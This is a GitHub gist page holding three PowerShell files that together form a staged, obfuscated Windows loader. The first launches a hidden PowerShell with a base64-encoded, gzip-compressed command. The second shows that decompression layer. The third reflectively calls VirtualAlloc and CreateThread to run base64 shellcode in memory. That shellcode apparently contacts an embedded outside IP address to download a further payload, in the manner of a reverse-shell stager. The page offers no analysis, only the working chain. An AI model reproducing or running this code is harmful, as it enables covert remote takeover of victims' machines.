Skip to content

Instantly share code, notes, and snippets.

@nl5887

nl5887/000_readme.md

Created March 7, 2019 19:21
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nl5887/8829d5767b515c149d351fa4488ff0d7 to your computer and use it in GitHub Desktop.
Save nl5887/8829d5767b515c149d351fa4488ff0d7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
001_1.ps1
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -e JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASAA0AHMASQBBAE8AaQB0AFUARgBzAEMAQQA3AFYAVwBhADQALwBhAFIAaABmACsAbgBFAGoANQBEADEAYQBGAGgARgBFAEoAWQBDADYANwAyAFUAaQBWAGEAZwBNADIASgBwAGkAYgA4AFIAagBZAHIAcQByAEIASAB0AHMARAA0ADgAdgBhAHcANwBYAHQAZgArADgAeABsADIAUwByAGIATgByAGsAbABWADQATABpAC8ARwBjAHkANQB6AHoAbgBHAGYAbQBqAEwAZQBOAEgARQA3AGoAUwBEAGgAbwA4AFUAYgA0ADQAOQAzAGIATgAyAE8AYwA0AGwAQQBRAEMANgB2AG4AVABiAHcAcQBDADQAWABnAHMARgAyAFcAMwByAHcAQgBTAGMARwBQACsANQBPAGQAOABJAHMAZwBQAHMAcABKADAAbwBsAEQAVABLAE8AbgBqAHgALwBiADIAegBRAGwARQBiADkAOABWAHoAVABDADUAUwB3AGoANABZAHAAUgBrAG8AawBsADQAVQAvAEIARABrAGgASwAzAG8AOQBXAGEAKwBKAHcANABRACsAaAA4AEgAdABGAFkALwBFAEsAcwA2AHYAYQBzAFkAMgBkAGcAQQBqAHYANQBjAGoATgBaAFkAUABZAHcAWABsAEEARgBUAE4AaABsAEkAdgBGADMAMwA0AHIAbABoADcAZgBTADAAKwBWADcAdgBNAFcAcwAwAHcAcwBtAHMAZQBNAGsANwBEAGkATQBsAFkAcwBDAFgAKwBWADgAZwBWAG4AeAA0AFMASQBSAFkATQA2AGEAWgB6AEYASABxAC8AWQBOAEcAcgBVAEsAMQBhAFUAWQBZADgATQB3AGQAdQBPAEcASQBRAEgAcwBaAHMAVgBTADUAQQBHAC8ARgBMAEMAdAAyAGsAawBYAEIATABLAFAAVgB6AGsAWQBoAEcARwA0AHoAUgAyAFoATgBkAE4AUwBaAFkAVgB5ADgASgBqADcAdgB2AHgANgBlAGwAWAA4AGYARwA2ADgASABRAGIAYwBSAHEAUwBpAGgANQB4AGsAcwBhAEoAUwBkAEkAZABkAFUAaABXADYAZQBIAEkAWgBXAFIASwB2AEMAZQB3AE0AbgBsAEsASQAvACsAcABWAEEASwAxAFgAYgB3AGgAWQBpAEgAYQBNAGwAWQBXAGYAcwBTAE4ATwBDAFQANwBHADIAegBmAGEAeQBTACsATgBBAEsAdABNAFUAOQBMAFoAUwBqAG0AYQA0AGsAYQBzAGIAdABsADUARwBKAGEAZgBDAFgAUwBDAHcATgBLADgATgB4AFkAQQBPAGoAOQA5AGUANwB0AHUANwBmAGUAagBUAFEAMABPAGIAegBrAEQASQB6AGUAUABKADcASABCAE8ASQBUAHgAMwBGAEcAegAyAHEALwBDAEwAVwB5AFkATQBCAEMAbQBNAGYAcABFAFQANABMAHMAMwBSAEwAUwBrACsAZgAwAFIAVQBLAHoANQB2AHkAdAA2ADIAbABtAHkAbwBvAEgAdABRAEoAegBEAHkAaQBtAEwAcABQAFkASABFAHQAYQBHAEUAYgA3AGMAWgBLAEwAdgBnADIATQB6AHYARQBvAHgASABwAEgAQwBNAGMAVQB1AGQARwBQAHYARQAxAGwASQBuAEgAeQBEAG4AQgB5AGsAMQB0AEMARQBHAEoAeABhAHUAQQB1AEIAMwBDAGkASQA5ADUARABsAHQAZQA3AEsALwBNAHUAaQBIAGwAbgAyADIAVgBMAFcAVQB1AFMAVwBVAEgASwBwAFYAQgBWAEYARABFADAAagArAEQAdQBWAFIAQwBMAE8AcQBSAFEAVQBKAEEANgBQAEkATgA3AEMAdAA0AFEASABsAHkAMAA3ADcAUwAvAEgAaABiAFAAZgA4AEcAcABXAEsAYgA0AFMAdwByAEMAKwBNAHQANwBEAG0AbgBMAEoAZwBFAE0AKwBLAFcAQgBUAG4ASwA2AEYAVQBrAGIAMwBsADgASABoAGEALwBoAEcAdABzAEcAYQBjAE8AegB2AGoATgAzAFYAUABwAE0ANQBEAFgAQgBkAHQAeABsAFAARgAwADYAMABEAFYASQBQAG0AWgBtAFIAQwBIAFkAcABaAGoAVQBSAFoANgAxAEMAWABLADAAYQBUACsAYgBlAEgAaQBxADAAaQAwAE0AVwBPAHcARQA4AEQAVABEAGkAbwBCAE0AegBrAEMASgBzACsANQBrAEUASwBNAFUAUABkAFMAeABTAFIAYwBEAHgATgBHAFEAdABBADQANwAzADIAVgBZAFIAOQAyACsAcABYAHQAWgArAHAAZwBuADcAagBGAHIAdwBLADgAcwBmAGwAQwAzAFIAeQBMAEcAdwBnAHYAdwBvAE0AQwBtAHkAegBtAFoAUQBIAFIAbABNAE0AWgBrAHUATQBLAEwAUABwAGYARgBuADkAeABkAEYAegBDAGEASwBmAGsAVwBnAGoAeAB0AGoAawBlAGwAUwBQAFAATwBWADIAZwBWAHMANwBIAEsAeQBSAG4AQQBGAEkATwB5AGEAdABwAEgAQwBvADQASQAzAGYATgB5AHkARQBoAC8AbABRAGQAMABiAFkATQB6ADAASwBQAG0ATwBFAG8ARwB5AHIASgBlAHkAcgBwAEIAcgB3AFcAYgBlAGgAeAA1ADkANwA5ADEARgAvADMAcQBtAG4AbgBFAEgAaQB5AG4AdQBsAEcAYgA5AHkAWgA5AEgAcgBOAFgAZAA5AEUAVABXADUAMgBkAGYANQBwAHIASABPAGoATwAxACsAdgBUAGIAawAzAHQAUgBaADgAcQBjAHUAOQBHAGEAMQB0AEYAcwAxAFQAMABxAGMAbgBjAHkAQwA3AGkAMABQADEANwBxAFMAYwA5AGoAWABsAGMARgByADcAcgByAGYAbwBlAEoANQAvADcANQBsAFQAcQBhAFgAUwBnAGQAMgBlAEsATABVADYASABuAFMANgAyADQARwB0ADcASgBWAGEATQArAHYAUwBmAFcAOQBDAHIAYwBtAG0AcgAvAEwAVgBBAGoARgBzAGUAVgBWAC8ATABqADEAZwBlAGgAaQBrAGEAeQBUAEYAcQB4AEQAVgBaAEMAMQBvAFkATAB1AFYASQBDADAAdwAzAE8ATwBpAFYAMwAyAHcARABuAFYAcABPAEwAUABnAHgAWgAzAEUASgB0AGkAcgBTAGcAagBHAFAAcwB6AFYANgBiADAAOABrAGUAVQA3AFQAVgBjAGcAMwBaADIARgAzAEsANABaAHQAdQB4AHAAdAAyAFYAYQAyAHIASQA3AHMAbwBlAEcAbwBVAGsARABGAEMASABkAFEAagBFAG4AbgBiADQAMQBzAGIAUABtAHMATAA2AGMARAB6AHUAcQBpAGoAUQAzAEcAWABYAFYAbwBkADEAQgBQAFgAdwBLAEUAagB6AFQAVAAwAGgARABLAFoAbwA1AEQAYQBJADUAagBjAFYATQBiAHcAMQA3AG0AeQBiAGUATABMAGoASgBGAHEAMgBGAGoAVABiAFkAbQBtAG8AegBlAHgAbQBiAEcAMwBXAEMAcABhAEcAMwA2AGsAbwBOAHAAegBFAE4AbAAyAEcAdABoAFIAQwBTAHIASgByAEIAdwBhAGMAKwByAFMAZAB6AG8AMgBOAHgATwAwAHIANgBKAEUAVABLAEUAawAzAHYAbAByAGIAZQBNAHQAZgBCAGUAbABwAC8AbQBKAGcAYgBhAFcAMQBJAFUAeABYAFYAcwAvADAAcQBHAGwASwBqAHAAeAA1AFcASgAzAFIAYwBXAFYAawBEAE0AVABSAGMAUgBrAEYANwBOAFgAZQBWADYAYwBZAGQAdQBhAEcAYQB1AHIAMQBGAFkAMgBSAEoAUwB6AFMAZgBqAHEAWQBSAG8AbABNAHIAUQBLAE4ANQBNAEwATgA2AHkANgBaAHoAawBtAHUAbwAvAHQAQgB5AGsARABvAGcATQA2AFYAbABkAGwAUgBsADEARgBOAGEAYgB2AGgAQQBIAGYAWgBCAHQAcgBSAGcAVABwAGQAVgByAGYAcABnADkAdwA5AHMARwBNAHUAZABnAFIAKwBvAE8AYQBiAHUARABJAFgAcgBGAEoAbgBOAGUANQBEAFoAMgBFADgAOAByAE0AcwBuAFcAVwA3ADMAbQAxAHIAYwB0AGIAVABZAFEAMgBFAGcAVABaAE0ANwBzAEUAWABuAEcAcQBEAFEANQAwAG8AUQA1AFAAcgBxAHYAbQBkAFoAVwBQAGQAbgBzAHEAegBFADAANwBFAHMATgBjAGQAVgBOAEcAdgBNAGgAMwBmAGQARABNAHEAaABQAEUAOAAwAFgAKwA3AEMAQwBNAE0ANwBrAFoAVQBaAFYAdQBuAEcAKwBuAGwAZQBsAFoAYQB3AGQAagBPAEsAVQBOADIAWABkAFoAQgBCAFcAbgBFADMAdwBmADMAbQByAG8AbwBDAFIANgBtAGQAbQBsAGwAUABkAGsAYgBnAGYAOAA1AHMAWQArAGoAZABhAGIAdABxAHQAZgBxAGgATwBUAEsAYgBCADgAQgAwAGEAOAB3ADIAdABjAEYAYQAzAHgAdAArACsANwA2AHAAMQBKADcAYgBJAFEAMwBaAHEAdQA0AEMAVgB6ADQAbwAwAGYANgBUAFAAOQA3ADUANwBzAFMAKwBuAHgANgBHAHgAMQBVADkAbABxADEAcQBGAGYAMgBVAGIAegBmAFkAYgB3AFgAcQBIAEwAVQBYACsAKwBoAGIASABkAEQAQQBhAFIAWgBnAEIAdgBzAEwATwB0AHYAdABSAEYAUABqAFYATAAyADIAcQBuAEYATQBjAHcAdABSAFAATgA5AHoATgBpAFMATgBDAEkATQA3AEEAdAB3AGkAYgBzAGUAQwB6AEYAagBzADUATQAwAHkAYgAyAHIAUQBwAHkALwBkAE0AMgAvAG0ARgBnAHcAYgA5AFYAZABIAEoAZQBHAHoAWQB1AGwATABDADcAMQBOAGYAZgB5ADQAaABDAEQAaABvAEsARgBXAFoAVQBBAGkAbgB3AGYAbAAyAHEARgBSAHEAMABFADMAcgBCADIAYQBOAFUAagB4ACsAOQBOAHEAeAA4AGwAUgBCAEUAZgBsAHYASgBlAGUAVQBiAG4ANABaAFcAZQAvAHAAZgB6AGsASwBUAGoANwAvAHkAOQBTADEAOQBNAHUAZwBEAC8AMwBQADUARAA2AE0AdgBjAHYAMAB1ADkAQwByADEAYQArAFoAUAB2AFYAOQBEADgAbgBmAGcAagBNAEgAOAA3AGMAeABwAFMARABwAGcAbgBuAE4AUwBPAFgAMgA4AEsAcgBBAEYAeABaADgAZQBJADIANQBlAHkAaAA1AHQANwAxAHkAYQAvAEQAbwB5ADEALwBQADQAUQByADEAcgB1ADMAZgB3AE4AZwBHAHkAQgBKAGYAQQBzAEEAQQBBAD0APQAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA=';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);
Raw
002_
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Raw
003_
function xGok {
Param ($bqkob, $hxuZ)
$goJQv = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $goJQv.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($goJQv.GetMethod('GetModuleHandle')).Invoke($null, @($bqkob)))), $hxuZ))
}
function ipx {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $qk,
[Parameter(Position = 1)] [Type] $xFQ = [Void]
)
$unvPB = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$unvPB.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $qk).SetImplementationFlags('Runtime, Managed')
$unvPB.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $xFQ, $qk).SetImplementationFlags('Runtime, Managed')
return $unvPB.CreateType()
}
[Byte[]]$iU = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2i7AQAA6GIBAAAvUVdESm5WRE5SUGZEOWNMMG1LVnVIUVoteDJUQWs4N2ZXNDFFVGdpOEFNWDVHazhpaTIzVGVrVTc3eGc3YTI5NHk4akYtSlY5YWVkaURGTWZoSkFQa1NfbE13c3RmZm05VVV1U0MtOEFIR2pXMDUtWnpJemVBZVR6ZWI5SjhjR29QSk1jM1RFV2swbnNiMHFxbzVybUs3VlVNZnhCbXdBRkdOdmFrdHY3OU1ZVXRORnViRUhVOXhTUHZ4czA0V295cVFLeTB5SDFBOHB5dm9icl8AUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6EsAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///84OS4xMDUuMTk0LjIwMgC74B0qCmimlb2d/9U8BnwKgPvgdQW7RxNyb2oAU//V")
$icyG = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll VirtualAlloc), (ipx @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iU.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($iU, 0, $icyG, $iU.length)
$cw = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll CreateThread), (ipx @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$icyG,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll WaitForSingleObject), (ipx @([IntPtr], [Int32]))).Invoke($cw,0xffffffff) | Out-Null
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment